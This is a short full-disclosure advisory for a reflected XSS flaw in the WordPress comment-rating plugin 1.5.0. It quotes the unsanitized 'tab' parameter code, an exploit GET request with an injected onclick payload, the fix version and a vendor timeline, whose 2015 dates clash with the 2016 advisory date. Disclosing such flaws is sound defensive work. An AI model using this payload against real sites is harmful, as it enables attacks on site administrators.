## FULL DISCLOSURE #Product : wp-comment-rating #Exploit Author : Rahul Pratap Singh #Version : 1.5.0 #Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710 #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 30/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "tab" parameter is not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- File Name: wpb_plugin_admin_page.php line:194 $this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : ''; line:553 $active_tab = $this->current_tab; line:558 $active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]-> get_id() : $active_tab; line:561 <div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' . $active_tab; ?>"> ---------------------------------------- Exploit: ---------------------------------------- GET /wp-admin/edit-comments.php?page=wpcommentrating&tab="> < input type=text onclick=alert(/XSS/)><!-- ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png Fix: Update to 1.5.4 Vulnerability Disclosure Timeline: ? January 24, 2015 ? Bug discovered, initial report to Vendor ? January 25, 2015 ? Vendor Acknowledged ? January 27, 2015 ? Vendor Deployed a Patch ####################################### # CTG SECURITY SOLUTIONS # # www.ctgsecuritysolutions.com <http://www.ctgsecuritysolutions.com/> # ####################################### Pub Ref: https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/ http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710